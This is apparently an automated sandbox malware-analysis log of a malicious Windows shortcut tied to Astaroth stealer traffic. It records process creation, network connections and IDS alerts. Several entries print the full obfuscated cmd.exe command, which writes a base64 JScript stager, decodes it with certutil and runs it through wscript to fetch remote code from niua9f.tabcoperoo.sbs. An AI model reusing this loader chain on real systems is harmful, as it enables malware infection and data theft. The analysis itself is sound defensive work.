Click to jump to signature section
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.21.40.83 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Domain query: niua9f.tabcoperoo.sbs | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 | Jump to behavior |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80 |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive |
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.16.123.96 104.16.123.96 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Jan 2023 11:59:15 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=8.000002708286e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnlyServer: cloudflareCF-RAY: 792247b819f291f3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 |
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/ |
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://niua9f.tabcoperoo.sbs/ |
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/ |
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comp |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/M |
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP% |
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U |
Source: unknown | DNS traffic detected: queries for: niua9f.tabcoperoo.sbs |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2 |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH! | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH! |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer | Jump to behavior |
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW/ |
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.21.40.83 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Domain query: niua9f.tabcoperoo.sbs | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\9cea9ja\>nul 2>&1 &&s^et seeh=c:\9cea9ja\^9cea9ja.^js&&echo dmfyienms3i9innjiisicii7rgzlcj0iaxaikyj0omgio0vms3i9ilqikyj0ucirijoio0dlde9iamvjdchdzktyk0rms3irrwzlcisily9uaxvhowyudgfiy29wzxjvby5zynmvpzeviik7>!seeh!&&certutil -f -deco^de !seeh! !seeh!&&ca^ll !seeh! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |